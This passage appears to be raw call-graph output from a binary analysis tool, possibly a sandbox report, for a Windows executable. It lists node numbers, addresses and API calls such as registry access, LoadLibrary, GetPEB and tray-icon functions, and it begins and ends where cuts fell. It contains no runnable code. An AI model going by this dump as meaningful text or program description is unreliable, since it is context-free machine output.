102807->102748 102808->102724 102809->102750 102810->102764 102811->102750 102812->102761 102813->102766 102814->102744 102815->102750 102816->102706 102817->102711 102818->102748 102820 8c0d53 __setmode 102819->102820 102821 8c0d77 102820->102821 102822 8c0d60 102820->102822 102824 8c0e3b 102821->102824 102827 8c0d8b 102821->102827 102823 8b8af4 __dosmaperr 58 API calls 102822->102823 102826 8c0d65 102823->102826 102825 8b8af4 __dosmaperr 58 API calls 102824->102825 102828 8c0dae 102825->102828 102829 8b8b28 __cftof_l 58 API calls 102826->102829 102830 8c0da9 102827->102830 102831 8c0db6 102827->102831 102837 8b8b28 __cftof_l 58 API calls 102828->102837 102844 8c0d6c __setmode 102829->102844 102834 8b8af4 __dosmaperr 58 API calls 102830->102834 102832 8c0dd8 102831->102832 102833 8c0dc3 102831->102833 102836 8bd206 ___lock_fhandle 59 API calls 102832->102836 102835 8b8af4 __dosmaperr 58 API calls 102833->102835 102834->102828 102838 8c0dc8 102835->102838 102839 8c0dde 102836->102839 102840 8c0dd0 102837->102840 102841 8b8b28 __cftof_l 58 API calls 102838->102841 102842 8c0e04 102839->102842 102843 8c0df1 102839->102843 102846 8b8db6 __cftof_l 9 API calls 102840->102846 102841->102840 102847 8b8b28 __cftof_l 58 API calls 102842->102847 102845 8c0e5b __read_nolock 70 API calls 102843->102845 102844->102778 102848 8c0dfd 102845->102848 102846->102844 102849 8c0e09 102847->102849 102851 8c0e33 __read LeaveCriticalSection 102848->102851 102850 8b8af4 __dosmaperr 58 API calls 102849->102850 102850->102848 102851->102844 102852->102770 102853->102779 102854->102773 102856 8e60cb 102855->102856 102857 8e60e8 102855->102857 102856->102857 102859 8e60ab 59 API calls Mailbox 102856->102859 102857->102065 102859->102856 102860 8b48bf 102863 8b48dd LeaveCriticalSection LeaveCriticalSection _fprintf 102860->102863 102862 8b489f __setmode 102863->102862 102864 89107d 102869 89708b 102864->102869 102866 89108c 102867 8b2d40 __cinit 67 API calls 102866->102867 102868 891096 102867->102868 102870 89709b __ftell_nolock 102869->102870 102871 897667 59 API calls 102870->102871 102872 897151 102871->102872 102900 894706 102872->102900 102874 89715a 102907 8b050b 102874->102907 102877 897cab 59 API calls 102878 897173 102877->102878 102913 893f74 102878->102913 102881 897667 59 API calls 102882 89718b 102881->102882 102883 897d8c 59 API calls 102882->102883 102884 897194 RegOpenKeyExW 102883->102884 102885 8ce8b1 RegQueryValueExW 102884->102885 102889 8971b6 Mailbox 102884->102889 102886 8ce8ce 102885->102886 102887 8ce943 RegCloseKey 102885->102887 102888 8b0db6 Mailbox 59 API calls 102886->102888 102887->102889 102899 8ce955 _wcscat Mailbox __NMSG_WRITE 102887->102899 102890 8ce8e7 102888->102890 102889->102866 102892 89522e 59 API calls 102890->102892 102891 8979f2 59 API calls 102891->102899 102893 8ce8f2 RegQueryValueExW 102892->102893 102894 8ce90f 102893->102894 102896 8ce929 102893->102896 102895 897bcc 59 API calls 102894->102895 102895->102896 102896->102887 102897 897de1 59 API calls 102897->102899 102898 893f74 59 API calls 102898->102899 102899->102889 102899->102891 102899->102897 102899->102898 102919 8c1940 102900->102919 102903 897de1 59 API calls 102904 894739 102903->102904 102921 894750 102904->102921 102906 894743 Mailbox 102906->102874 102908 8c1940 __ftell_nolock 102907->102908 102909 8b0518 GetFullPathNameW 102908->102909 102910 8b053a 102909->102910 102911 897bcc 59 API calls 102910->102911 102912 897165 102911->102912 102912->102877 102914 893f82 102913->102914 102918 893fa4 _memmove 102913->102918 102916 8b0db6 Mailbox 59 API calls 102914->102916 102915 8b0db6 Mailbox 59 API calls 102917 893fb8 102915->102917 102916->102918 102917->102881 102918->102915 102920 894713 GetModuleFileNameW 102919->102920 102920->102903 102922 8c1940 __ftell_nolock 102921->102922 102923 89475d GetFullPathNameW 102922->102923 102924 894799 102923->102924 102925 89477c 102923->102925 102927 897d8c 59 API calls 102924->102927 102926 897bcc 59 API calls 102925->102926 102928 894788 102926->102928 102927->102928 102931 897726 102928->102931 102932 897734 102931->102932 102933 897d2c 59 API calls 102932->102933 102934 894794 102933->102934 102934->102906 102935 894dfd 102936 894e08 LoadLibraryExW 102935->102936 102937 8cd8e6 102935->102937 102955 894b6a 102936->102955 102938 894e4a 66 API calls 102937->102938 102940 8cd8ed 102938->102940 102942 894b6a 3 API calls 102940->102942 102944 8cd8f5 102942->102944 102948 894f0b 74 API calls 102944->102948 102945 894e2f 102945->102944 102946 894e3b 102945->102946 102947 894e4a 66 API calls 102946->102947 102949 894e40 102947->102949 102950 8cd90c 102948->102950 102981 8f9109 GetSystemTimeAsFileTime 102950->102981 102952 8cd91c 102982 894ec7 69 API calls 102952->102982 102954 8cd929 102983 894c36 102955->102983 102958 894c36 2 API calls 102961 894b8f 102958->102961 102959 894baa 102962 894c70 102959->102962 102960 894ba1 FreeLibrary 102960->102959 102961->102959 102961->102960 102963 8b0db6 Mailbox 59 API calls 102962->102963 102964 894c85 102963->102964 102965 89522e 59 API calls 102964->102965 102966 894c91 _memmove 102965->102966 102967 894ccc 102966->102967 102968 894d89 102966->102968 102969 894dc1 102966->102969 102993 894ec7 69 API calls 102967->102993 102987 894e89 CreateStreamOnHGlobal 102968->102987 102994 8f991b 79 API calls 102969->102994 102973 894f0b 74 API calls 102978 894cd5 102973->102978 102974 894d69 102974->102945 102975 894ee5 69 API calls 102975->102978 102976 8cd8a7 102977 894ee5 69 API calls 102976->102977 102979 8cd8bb 102977->102979 102978->102973 102978->102974 102978->102975 102978->102976 102980 894f0b 74 API calls 102979->102980 102980->102974 102981->102952 102982->102954 102984 894b83 102983->102984 102985 894c3f LoadLibraryA 102983->102985 102984->102958 102984->102961 102985->102984 102986 894c50 GetProcAddress 102985->102986 102986->102984 102988 894ea3 FindResourceExW 102987->102988 102992 894ec0 102987->102992 102989 8cd933 LoadResource 102988->102989 102988->102992 102990 8cd948 SizeofResource 102989->102990 102989->102992 102991 8cd95c LockResource 102990->102991 102990->102992 102991->102992 102992->102967 102993->102978 102994->102967 102995 1500dc8 103009 14fea08 102995->103009 102997 1500e68 103012 1500cb8 102997->103012 103015 1501ea8 GetPEB 103009->103015 103011 14ff093 103011->102997 103013 1500cc1 Sleep 103012->103013 103014 1500ccf 103013->103014 103016 1501ed2 103015->103016 103016->103011 103017 893633 103018 89366a 103017->103018 103019 893688 103018->103019 103020 8936e7 103018->103020 103058 8936e5 103018->103058 103024 89374b PostQuitMessage 103019->103024 103025 893695 103019->103025 103022 8cd0cc 103020->103022 103023 8936ed 103020->103023 103021 8936ca DefWindowProcW 103026 8936d8 103021->103026 103066 8a1070 10 API calls Mailbox 103022->103066 103027 8936f2 103023->103027 103028 893715 SetTimer RegisterWindowMessageW 103023->103028 103024->103026 103030 8cd154 103025->103030 103031 8936a0 103025->103031 103033 8936f9 KillTimer 103027->103033 103034 8cd06f 103027->103034 103028->103026 103036 89373e CreatePopupMenu 103028->103036 103082 8f2527 71 API calls _memset 103030->103082 103037 8936a8 103031->103037 103038 893755 103031->103038 103062 89443a Shell_NotifyIconW _memset 103033->103062 103043 8cd0a8 MoveWindow 103034->103043 103044 8cd074 103034->103044 103035 8cd0f3 103067 8a1093 282 API calls Mailbox 103035->103067 103036->103026 103039 8cd139 103037->103039 103040 8936b3 103037->103040 103064 8944a0 64 API calls _memset 103038->103064 103039->103021 103081 8e7c36 59 API calls Mailbox 103039->103081 103047 8936be 103040->103047 103048 8cd124 103040->103048 103041 8cd166 103041->103021 103041->103026 103043->103026 103050 8cd078 103044->103050 103051 8cd097 SetFocus 103044->103051 103047->103021 103068 89443a Shell_NotifyIconW _memset 103047->103068 103080 8f2d36 81 API calls _memset 103048->103080 103049 893764 103049->103026 103050->103047 103053 8cd081 103050->103053 103051->103026 103052 89370c 103063 893114 DeleteObject DestroyWindow Mailbox 103052->103063 103065 8a1070 10 API calls Mailbox 103053->103065 103058->103021 103060 8cd118 103069 89434a 103060->103069 103062->103052 103063->103026 103064->103049 103065->103026 103066->103035 103067->103047 103068->103060 103070 894375 _memset 103069->103070 103083 894182 103070->103083 103073 8943fa 103075 894430 Shell_NotifyIconW 103073->103075 103076 894414 Shell_NotifyIconW 103073->103076 103077 894422 103075->103077 103076->103077 103087 89407c 103077->103087 103079 894429 103079->103058 103080->103049 103081->103058 103082->103041 103084 8cd423 103083->103084 103085 894196 103083->103085 103084->103085 103086 8cd42c DestroyIcon 103084->103086 103085->103073 103109 8f2f94 62 API calls _W_store_winword 103085->103109 103086->103085 103088 894098 103087->103088 103089 89416f Mailbox 103087->103089 103110 897a16 103088->103110 103089->103079 103092 8cd3c8 LoadStringW 103096 8cd3e2 103092->103096 103093 8940b3 103094 897bcc 59 API calls 103093->103094 103095 8940c8 103094->103095 103095->103096 103097 8940d9 103095->103097 103098 897b2e 59 API calls 103096->103098 103099 8940e3 103097->103099 103100 894174 103097->103100 103103 8cd3ec 103098->103103 103102 897b2e 59 API calls 103099->103102 103101 898047 59 API calls 103100->103101 103106 8940ed _memset _wcscpy 103101->103106 103102->103106 103104 897cab 59 API calls 103103->103104 103103->103106 103105 8cd40e 103104->103105 103108 897cab 59 API calls 103105->103108 103107 894155 Shell_NotifyIconW 103106->103107 103107->103089 103108->103106 103109->103073 103111 8b0db6 Mailbox 59 API calls 103110->103111 103112 897a3b 103111->103112 103113 898029 59 API calls 103112->103113 103114 8940a6 103113->103114 103114->103092 103114->103093 103115 8c0637 103121 8c063c 103115->103121 103116 8c0641 103120 8c0651 103116->103120 103127 8b8b28 58 API calls __getptd_noexit 103116->103127 103118 8c0646 103128 8b8db6 9 API calls __cftof_l 103118->103128 103121->103116 103129 8b37cb 60 API calls 2 library calls 103121->103129 103123 8c07f5 103123->103116 103130 8b37cb 60 API calls 2 library calls 103123->103130 103125 8c0814 103125->103116 103131 8b37cb 60 API calls 2 library calls 103125->103131 103127->103118 103128->103120 103129->103123 103130->103125 103131->103116 103136 891055 103141 892649 103136->103141 103139 8b2d40 __cinit 67 API calls 103140 891064 103139->103140 103142 897667 59 API calls 103141->103142 103143 8926b7 103142->103143 103148 893582 103143->103148 103145 892754 103147 89105a 103145->103147 103151 893416 59 API calls 2 library calls 103145->103151 103147->103139 103152 8935b0 103148->103152 103151->103145 103153 8935bd 103152->103153 103154 8935a1 103152->103154 103153->103154 103155 8935c4 RegOpenKeyExW 103153->103155 103154->103145 103155->103154 103156 8935de RegQueryValueExW 103155->103156 103157 8935ff 103156->103157 103158 893614 RegCloseKey 103156->103158 103157->103158 103158->103154 103159 8b7c56 103160 8b7c62 __setmode 103159->103160 103196 8b9e08 GetStartupInfoW 103160->103196 103162 8b7c67 103198 8b8b7c GetProcessHeap 103162->103198 103164 8b7cbf 103165 8b7cca 103164->103165 103281 8b7da6 58 API calls 3 library calls 103164->103281 103199 8b9ae6 103165->103199 103168 8b7cd0 103169 8b7cdb __RTC_Initialize 103168->103169 103282 8b7da6 58 API calls 3 library calls 103168->103282 103220 8bd5d2 103169->103220 103172 8b7cea 103173 8b7cf6 GetCommandLineW 103172->103173 103283 8b7da6 58 API calls 3 library calls 103172->103283 103239 8c4f23 GetEnvironmentStringsW 103173->103239 103177 8b7cf5 103177->103173 103179 8b7d10 103180 8b7d1b 103179->103180 103284 8b30b5 58 API calls 3 library calls 103179->103284 103249 8c4d58 103180->103249 103184 8b7d2c 103263 8b30ef 103184->103263 103187 8b7d34 103188 8b7d3f __wwincmdln 103187->103188 103286 8b30b5 58 API calls 3 library calls 103187->103286 103269 8947d0 103188->103269 103191 8b7d53 103192 8b7d62 103191->103192 103287 8b3358 58 API calls _doexit 103191->103287 103288 8b30e0 58 API calls _doexit 103192->103288 103195 8b7d67 __setmode 103197 8b9e1e 103196->103197 103197->103162 103198->103164 103289 8b3187 36 API calls 2 library calls 103199->103289 103201 8b9aeb 103290 8b9d3c InitializeCriticalSectionAndSpinCount __getstream 103201->103290 103203 8b9af0 103204 8b9af4 103203->103204 103292 8b9d8a TlsAlloc 103203->103292 103291 8b9b5c 61 API calls 2 library calls 103204->103291 103207 8b9b06 103207->103204 103209 8b9b11 103207->103209 103208 8b9af9 103208->103168 103293 8b87d5 103209->103293 103212 8b9b53 103301 8b9b5c 61 API calls 2 library calls 103212->103301 103215 8b9b32 103215->103212 103217 8b9b38 103215->103217 103216 8b9b58 103216->103168 103300 8b9a33 58 API calls 4 library calls 103217->103300 103219 8b9b40 GetCurrentThreadId 103219->103168 103221 8bd5de __setmode 103220->103221 103222 8b9c0b __lock 58 API calls 103221->103222 103223 8bd5e5 103222->103223 103224 8b87d5 __calloc_crt 58 API calls 103223->103224 103226 8bd5f6 103224->103226 103225 8bd661 GetStartupInfoW 103233 8bd676 103225->103233 103236 8bd7a5 103225->103236 103226->103225 103227 8bd601 @_EH4_CallFilterFunc@8 __setmode 103226->103227 103227->103172 103228 8bd86d 103315 8bd87d LeaveCriticalSection _doexit 103228->103315 103230 8b87d5 __calloc_crt 58 API calls 103230->103233 103231 8bd7f2 GetStdHandle 103231->103236 103232 8bd805 GetFileType 103232->103236 103233->103230 103235 8bd6c4 103233->103235 103233->103236 103234 8bd6f8 GetFileType 103234->103235 103235->103234 103235->103236 103313 8b9e2b InitializeCriticalSectionAndSpinCount 103235->103313 103236->103228 103236->103231 103236->103232 103314 8b9e2b InitializeCriticalSectionAndSpinCount 103236->103314 103240 8b7d06 103239->103240 103241 8c4f34 103239->103241 103245 8c4b1b GetModuleFileNameW 103240->103245 103316 8b881d 58 API calls 2 library calls 103241->103316 103243 8c4f5a _memmove 103244 8c4f70 FreeEnvironmentStringsW 103243->103244 103244->103240 103246 8c4b4f _wparse_cmdline 103245->103246 103248 8c4b8f _wparse_cmdline 103246->103248 103317 8b881d 58 API calls 2 library calls 103246->103317 103248->103179 103250 8b7d21 103249->103250 103251 8c4d71 __NMSG_WRITE 103249->103251 103250->103184 103285 8b30b5 58 API calls 3 library calls 103250->103285 103252 8b87d5 __calloc_crt 58 API calls 103251->103252 103259 8c4d9a __NMSG_WRITE 103252->103259 103253 8c4df1 103254 8b2d55 _free 58 API calls 103253->103254 103254->103250 103255 8b87d5 __calloc_crt 58 API calls 103255->103259 103256 8c4e16 103258 8b2d55 _free 58 API calls 103256->103258 103258->103250 103259->103250 103259->103253 103259->103255 103259->103256 103260 8c4e2d 103259->103260 103318 8c4607 58 API calls __cftof_l 103259->103318 103319 8b8dc6 8 API calls 2 library calls 103260->103319 103262 8c4e39 103265 8b30fb __IsNonwritableInCurrentImage 103263->103265 103320 8ba4d1 103265->103320 103266 8b3119 __initterm_e 103267 8b2d40 __cinit 67 API calls 103266->103267 103268 8b3138 __cinit __IsNonwritableInCurrentImage 103266->103268 103267->103268 103268->103187 103270 8947ea 103269->103270 103280 894889 103269->103280 103271 894824 IsThemeActive 103270->103271 103323 8b336c 103271->103323 103275 894850 103335 8948fd SystemParametersInfoW SystemParametersInfoW 103275->103335 103277 89485c 103336 893b3a 103277->103336 103279 894864 SystemParametersInfoW 103279->103280 103280->103191 103281->103165 103282->103169 103283->103177 103287->103192 103288->103195 103289->103201 103290->103203 103291->103208 103292->103207 103295 8b87dc 103293->103295 103296 8b8817 103295->103296 103298 8b87fa 103295->103298 103302 8c51f6 103295->103302 103296->103212 103299 8b9de6 TlsSetValue 103296->103299 103298->103295 103298->103296 103310 8ba132 Sleep 103298->103310 103299->103215 103300->103219 103301->103216 103303 8c521c 103302->103303 103304 8c5201 103302->103304 103306 8c522c HeapAlloc 103303->103306 103308 8c5212 103303->103308 103312 8b33a1 DecodePointer 103303->103312 103304->103303 103305 8c520d 103304->103305 103311 8b8b28 58 API calls __getptd_noexit 103305->103311 103306->103303 103306->103308 103308->103295 103310->103298 103311->103308 103312->103303 103313->103235 103314->103236 103315->103227 103316->103243 103317->103248 103318->103259 103319->103262 103321 8ba4d4 EncodePointer 103320->103321 103321->103321 103322 8ba4ee 103321->103322 103322->103266 103324 8b9c0b __lock 58 API calls 103323->103324 103325 8b3377 DecodePointer EncodePointer 103324->103325 103388 8b9d75 LeaveCriticalSection 103325->103388 103327 894849 103328 8b33d4 103327->103328 103329 8b33f8 103328->103329 103330 8b33de 103328->103330 103329->103275 103330->103329 103389 8b8b28 58 API calls __getptd_noexit 103330->103389 103332 8b33e8 103390 8b8db6 9 API calls __cftof_l 103332->103390 103334 8b33f3 103334->103275 103335->103277 103337 893b47 __ftell_nolock 103336->103337 103338 897667 59 API calls 103337->103338 103339 893b51 GetCurrentDirectoryW 103338->103339 103340 893766 103339->103340 103341 893b7a IsDebuggerPresent 103340->103341 103342 893b88 103341->103342 103343 8cd272 MessageBoxA 103341->103343 103345 8cd28c 103342->103345 103346 893ba5 103342->103346 103374 893c61 103342->103374 103343->103345 103344 893c68 SetCurrentDirectoryW 103348 893c75 Mailbox 103344->103348 103509 897213 59 API calls Mailbox 103345->103509 103391 897285 103346->103391 103348->103279 103350 8cd29c 103355 8cd2b2 SetCurrentDirectoryW 103350->103355 103352 893bc3 GetFullPathNameW 103353 897bcc 59 API calls 103352->103353 103354 893bfe 103353->103354 103407 8a092d 103354->103407 103355->103348 103358 893c1c 103359 893c26 103358->103359 103510 8e874b AllocateAndInitializeSid CheckTokenMembership FreeSid 103358->103510 103423 893a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 103359->103423 103362 8cd2cf 103362->103359 103365 8cd2e0 103362->103365 103367 894706 61 API calls 103365->103367 103366 893c30 103368 893c43 103366->103368 103371 89434a 68 API calls 103366->103371 103370 8cd2e8 103367->103370 103431 8a09d0 103368->103431 103373 897de1 59 API calls 103370->103373 103371->103368 103372 893c4e 103372->103374 103375 8cd2f5 103373->103375 103374->103344 103377 8cd2ff 103375->103377 103378 8cd324 103375->103378 103380 897cab 59 API calls 103377->103380 103379 897cab 59 API calls 103378->103379 103382 8cd320 GetForegroundWindow ShellExecuteW 103379->103382 103381 8cd30a 103380->103381 103383 897b2e 59 API calls 103381->103383 103386 8cd354 Mailbox 103382->103386 103385 8cd317 103383->103385 103387 897cab 59 API calls 103385->103387 103386->103374 103387->103382 103388->103327 103389->103332 103390->103334 103392 897292 __ftell_nolock 103391->103392 103393 8972ab 103392->103393 103394 8cea22 _memset 103392->103394 103395 894750 60 API calls 103393->103395 103397 8cea3e GetOpenFileNameW 103394->103397 103396 8972b4 103395->103396 103511 8b0791 103396->103511 103399 8cea8d 103397->103399 103400 897bcc 59 API calls 103399->103400 103402 8ceaa2 103400->103402 103402->103402 103404 8972c9 103529 89686a 103404->103529 103408 8a093a __ftell_nolock 103407->103408 103695 896d80 103408->103695 103410 8a093f 103422 893c14 103410->103422 103705 8a119e 66 API calls 103410->103705 103412 8a094c 103412->103422 103706 8a3ee7 68 API calls Mailbox 103412->103706 103414 8a0955 103415 8a0959 GetFullPathNameW 103414->103415 103414->103422 103416 897bcc 59 API calls 103415->103416 103417 8a0985 103416->103417 103418 897bcc 59 API calls 103417->103418 103419 8a0992 103418->103419 103420 8d4cab _wcscat 103419->103420 103421 897bcc 59 API calls 103419->103421 103421->103422 103422->103350 103422->103358 103424 893ab0 LoadImageW RegisterClassExW 103423->103424 103425 8cd261 103423->103425 103709 893041 7 API calls 103424->103709 103710 8947a0 LoadImageW EnumResourceNamesW 103425->103710 103428 893b34 103430 8939d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 103428->103430 103429 8cd26a 103430->103366 103432 8d4cc3 103431->103432 103444 8a09f5 103431->103444 103724 8f9e4a 66 API calls 3 library calls 103432->103724 103434 8a0cfa 103434->103372 103439 8a0a4b PeekMessageW 103469 8a0a05 Mailbox 103439->103469 103443 8a0ce4 103443->103434 103721 8a1070 10 API calls Mailbox 103443->103721 103444->103469 103725 899e5d 60 API calls 103444->103725 103726 8e6349 282 API calls 103444->103726 103445 8d4e81 Sleep 103445->103469 103450 8d4d50 TranslateAcceleratorW 103451 8a0e43 PeekMessageW 103450->103451 103450->103469 103451->103469 103452 8a0ea5 TranslateMessage DispatchMessageW 103452->103451 103453 8b0db6 59 API calls Mailbox 103453->103469 103454 8a0d13 timeGetTime 103454->103469 103455 8d581f WaitForSingleObject 103457 8d583c GetExitCodeProcess CloseHandle 103455->103457 103455->103469 103461 8a0f95 103457->103461 103458 8a0e5f Sleep 103478 8a0e70 Mailbox 103458->103478 103459 898047 59 API calls 103459->103469 103460 897667 59 API calls 103460->103478 103461->103372 103462 8d5af8 Sleep 103462->103478 103465 8b049f timeGetTime 103465->103478 103466 8a0f4e timeGetTime 103723 899e5d 60 API calls 103466->103723 103469->103439 103469->103443 103469->103445 103469->103450 103469->103451 103469->103452 103469->103453 103469->103454 103469->103455 103469->103458 103469->103459 103469->103461 103469->103462 103469->103466 103471 899837 59 API calls 103469->103471 103469->103478 103480 899e5d 60 API calls 103469->103480 103489 899ea0 255 API calls 103469->103489 103491 89f460 255 API calls 103469->103491 103493 897de1 59 API calls 103469->103493 103496 8984c0 69 API calls 103469->103496 103497 8f9e4a 66 API calls 103469->103497 103498 899c90 59 API calls Mailbox 103469->103498 103500 8e617e 59 API calls Mailbox 103469->103500 103501 8989b3 69 API calls 103469->103501 103502 8d55d5 VariantClear 103469->103502 103503 8d566b VariantClear 103469->103503 103504 8d5419 VariantClear 103469->103504 103505 8e6e8f 59 API calls 103469->103505 103506 898cd4 59 API calls Mailbox 103469->103506 103507 89b73c 255 API calls 103469->103507 103711 89e420 103469->103711 103718 89e6a0 282 API calls 2 library calls 103469->103718 103719 89fce0 282 API calls 2 library calls 103469->103719 103720 8931ce IsDialogMessageW GetClassLongW 103469->103720 103727 916018 59 API calls 103469->103727 103728 8f9a15 59 API calls Mailbox 103469->103728 103729 8ed4f2 59 API calls 103469->103729 103730 8e60ef 59 API calls 2 library calls 103469->103730 103731 898401 59 API calls 103469->103731 103732 8982df 59 API calls Mailbox 103469->103732 103470 8d5b8f GetExitCodeProcess 103471->103469 103478->103460 103478->103461 103478->103465 103478->103469 103478->103470 103480->103469 103489->103469 103491->103469 103493->103469 103496->103469 103497->103469 103498->103469 103500->103469 103501->103469 103502->103469 103503->103469 103504->103469 103505->103469 103506->103469 103507->103469 103509->103350 103510->103362 103512 8b079e __ftell_nolock 103511->103512 103513 8b079f GetLongPathNameW 103512->103513 103514 897bcc 59 API calls 103513->103514 103515 8972bd 103514->103515 103516 89700b 103515->103516 103517 897667 59 API calls 103516->103517 103518 89701d 103517->103518 103519 894750 60 API calls 103518->103519 103520 897028 103519->103520 103521 897033 103520->103521 103525 8ce885 103520->103525 103522 893f74 59 API calls 103521->103522 103524 89703f 103522->103524 103558 8934c2 103524->103558 103527 8ce89f 103525->103527 103564 897908 61 API calls 103525->103564 103528 897052 Mailbox 103528->103404 103531 89688f 103529->103531 103530 8ce031 103533 8ce04a 103530->103533 103534 8ce067 103530->103534 103531->103530 103532 8968ab 103531->103532 103536 8ce052 103532->103536 103537 8968b7 103532->103537 103538 894e4a 66 API calls 103533->103538 103535 8b0db6 Mailbox 59 API calls 103534->103535 103547 8ce0ac Mailbox 103535->103547 103662 8f42f8 67 API calls _wprintf 103536->103662 103565 896a8c 103537->103565 103538->103536 103541 8ce060 103541->103534 103543 8ce260 103544 8b2d55 _free 58 API calls 103543->103544 103545 8ce268 103544->103545 103546 894e4a 66 API calls 103545->103546 103552 8ce271 103546->103552 103547->103543 103547->103552 103555 897de1 59 API calls 103547->103555 103654 89750f 103547->103654 103663 8ef73d 59 API calls 2 library calls 103547->103663 103664 8ef65e 61 API calls 2 library calls 103547->103664 103665 8f737f 59 API calls Mailbox 103547->103665 103666 89735d 59 API calls Mailbox 103547->103666 103551 8b2d55 _free 58 API calls 103551->103552 103552->103551 103554 894e4a 66 API calls 103552->103554 103667 8ef7a1 66 API calls 3 library calls 103552->103667 103554->103552 103555->103547 103559 8934d4 103558->103559 103563 8934f3 _memmove 103558->103563 103561 8b0db6 Mailbox 59 API calls 103559->103561 103560 8b0db6 Mailbox 59 API calls 103562 89350a 103560->103562 103561->103563 103562->103528 103563->103560 103564->103525 103566 8ce41e 103565->103566 103567 896ab5 103565->103567 103683 8ef7a1 66 API calls 3 library calls 103566->103683 103673 8957a6 60 API calls Mailbox 103567->103673 103570 8ce431 103684 8ef7a1 66 API calls 3 library calls 103570->103684 103571 896ad7 103572 8957f6 67 API calls 103571->103572 103573 896aec 103572->103573 103573->103570 103575 896af4 103573->103575 103577 897667 59 API calls 103575->103577 103576 8ce44d 103580 896b61 103576->103580 103578 896b00 103577->103578 103674 8b0957 60 API calls __ftell_nolock 103578->103674 103582 896b6f 103580->103582 103583 8ce460 103580->103583 103581 896b0c 103584 897667 59 API calls 103581->103584 103586 897667 59 API calls 103582->103586 103585 895c6f CloseHandle 103583->103585 103587 896b18 103584->103587 103594 8ce46c 103585->103594 103588 896b78 103586->103588 103589 894750 60 API calls 103587->103589 103590 897667 59 API calls 103588->103590 103591 896b26 103589->103591 103592 896b81 103590->103592 103675 895850 ReadFile SetFilePointerEx 103591->103675 103596 89459b 59 API calls 103592->103596 103595 8ce4b1 103594->103595 103604 8ce4ac 103594->103604 103605 8ce4cd 103594->103605 103685 8ef7a1 66 API calls 3 library calls 103595->103685 103597 896b98 103596->103597 103600 897b2e 59 API calls 103597->103600 103599 896b52 103602 895aee 2 API calls 103599->103602 103603 896ba9 SetCurrentDirectoryW 103600->103603 103601 8ce4c8 103632 896d0c Mailbox 103601->103632 103602->103580 103610 896bbc Mailbox 103603->103610 103606 894e4a 66 API calls 103604->103606 103607 894e4a 66 API calls 103605->103607 103606->103595 103608 8ce4d2 103607->103608 103609 8b0db6 Mailbox 59 API calls 103608->103609 103616 8ce506 103609->103616 103612 8b0db6 Mailbox 59 API calls 103610->103612 103614 896bcf 103612->103614 103613 893bbb 103613->103352 103613->103374 103615 89522e 59 API calls 103614->103615 103643 896bda Mailbox __NMSG_WRITE 103615->103643 103617 89750f 59 API calls 103616->103617 103645 8ce54f Mailbox 103617->103645 103618 896ce7 103620 895c6f CloseHandle 103618->103620 103619 8ce740 103690 8f72df 59 API calls Mailbox 103619->103690 103622 896cf3 SetCurrentDirectoryW 103620->103622 103622->103632 103625 8ce762 103691 90fbce 59 API calls 2 library calls 103625->103691 103628 8ce76f 103630 8b2d55 _free 58 API calls 103628->103630 103629 8ce7d9 103694 8ef7a1 66 API calls 3 library calls 103629->103694 103630->103632 103668 8957d4 103632->103668 103634 89750f 59 API calls 103634->103645 103635 8ce7f2 103635->103618 103637 8ce7d1 103693 8ef5f7 59 API calls 4 library calls 103637->103693 103640 897de1 59 API calls 103640->103643 103643->103618 103643->103629 103643->103637 103643->103640 103676 89586d 67 API calls _wcscpy 103643->103676 103677 896f5d GetStringTypeW 103643->103677 103678 896ecc 60 API calls __wcsnicmp 103643->103678 103679 896faa GetStringTypeW __NMSG_WRITE 103643->103679 103680 8b363d GetStringTypeW _iswctype 103643->103680 103681 8968dc 95 API calls 3 library calls 103643->103681 103682 897213 59 API calls Mailbox 103643->103682 103644 897de1 59 API calls 103644->103645 103645->103619 103645->103634 103645->103644 103649 8ce792 103645->103649 103686 8ef73d 59 API calls 2 library calls 103645->103686 103687 8ef65e 61 API calls 2 library calls 103645->103687 103688 8f737f 59 API calls Mailbox 103645->103688 103689 897213 59 API calls Mailbox 103645->103689 103692 8ef7a1 66 API calls 3 library calls 103649->103692 103651 8ce7ab 103652 8b2d55 _free 58 API calls 103651->103652 103653 8ce7be 103652->103653 103653->103632 103655 8975af 103654->103655 103661 897522 _memmove 103654->103661 103658 8b0db6 Mailbox 59 API calls 103655->103658 103656 8b0db6 Mailbox 59 API calls 103657 897529 103656->103657 103659 897552 103657->103659 103660 8b0db6 Mailbox 59 API calls 103657->103660 103658->103661 103659->103547 103660->103659 103661->103656 103662->103541 103663->103547 103664->103547 103665->103547 103666->103547 103667->103552 103669 895c6f CloseHandle 103668->103669 103670 8957dc Mailbox 103669->103670 103671 895c6f CloseHandle 103670->103671 103672 8957eb 103671->103672 103672->103613 103673->103571 103674->103581 103675->103599 103676->103643 103677->103643 103678->103643 103679->103643 103680->103643 103681->103643 103682->103643 103683->103570 103684->103576 103685->103601 103686->103645 103687->103645 103688->103645 103689->103645 103690->103625 103691->103628 103692->103651 103693->103629 103694->103635 103696 896d95 103695->103696 103700 896ea9 103695->103700 103697 8b0db6 Mailbox 59 API calls 103696->103697 103696->103700 103699 896dbc 103697->103699 103698 8b0db6 Mailbox 59 API calls 103704 896e31 103698->103704 103699->103698 103700->103410 103703 89750f 59 API calls 103703->103704 103704->103700 103704->103703 103707 89735d 59 API calls Mailbox 103704->103707 103708 8e6553 59 API calls Mailbox 103704->103708 103705->103412 103706->103414 103707->103704 103708->103704 103709->103428 103710->103429 103712 89e43d 103711->103712 103713 89e451 103711->103713 103718->103469 103719->103469 103720->103469 103723->103469 103724->103444 103725->103444 103726->103444 103727->103469 103728->103469 103729->103469 103730->103469 103731->103469 103732->103469 103742 8f8b11 103743 8f8b1f 103742->103743 103744 8f8b67 103743->103744 103745 8f8b52 103743->103745 103749 8f8b28 103743->103749 103753 8f8d91 103744->103753 103747 8b53a6 __fcloseall 65 API calls 103745->103747 103745->103749 103747->103749 103748 8f8ba8 103750 8f8bb9 103748->103750 103751 8b53a6 __fcloseall 65 API calls 103748->103751 103750->103749 103752 8b53a6 __fcloseall 65 API calls 103750->103752 103751->103750 103752->103749 103754 8f8d9f __tzset_nolock _memmove 103753->103754 103755 8f8db6 103753->103755 103754->103748 103756 8b55e2 __fread_nolock 74 API calls 103755->103756 103756->103754 103757 891016 103762 894974 103757->103762 103760 8b2d40 __cinit 67 API calls 103761 891025 103760->103761 103763 8b0db6 Mailbox 59 API calls 103762->103763 103764 89497c 103763->103764 103765 89101b 103764->103765 103769 894936 103764->103769 103765->103760 103770 89493f 103769->103770 103771 894951 103769->103771 103772 8b2d40 __cinit 67 API calls 